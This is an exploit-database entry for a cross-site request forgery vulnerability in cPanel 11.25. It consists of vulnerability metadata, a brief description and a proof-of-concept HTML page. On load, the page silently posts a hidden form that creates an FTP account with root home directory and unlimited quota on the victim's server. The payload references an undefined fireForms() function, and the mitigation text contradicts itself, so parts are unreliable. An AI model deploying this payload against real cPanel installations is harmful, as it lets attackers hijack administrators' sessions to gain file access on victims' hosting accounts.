header-logo
Suggest Exploit
vendor:
cPanel
by:
5.5
CVSS
MEDIUM
Cross-Site Request Forgery
352
CWE
Product Name: cPanel
Affected Version From: cPanel 11.25
Affected Version To: Other versions may also be affected.
Patch Exists: NO
Related CWE:
CPE: a:cpanel:cpanel:11.25
Metasploit:
Other Scripts:
Platforms Tested:

cPanel Cross-Site Request Forgery Vulnerability

The cPanel software is vulnerable to a cross-site request forgery (CSRF) vulnerability. By exploiting this vulnerability, an attacker can perform certain administrative actions on behalf of the victim, leading to further attacks.

Mitigation:

There is no known mitigation or remediation for this vulnerability. It is recommended to update to the latest version of cPanel to prevent exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/41391/info

cPanel is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain administrative actions. This may lead to further attacks.

cPanel 11.25 is vulnerable; other versions may also be affected.

<html>
<body onload="javascript:fireForms()">
<form method="POST" name="form0" action="
http://www.example.com/frontend/x3/ftp/doaddftp.html">
<input type="hidden" name="login" value="name"/>
<input type="hidden" name="password" value="pass"/>
<input type="hidden" name="password2" value="pass"/>
<input type="hidden" name="homedir" value="/"/>
<input type="hidden" name="quota" value="unlimited"/>
</form>
</body>
</html>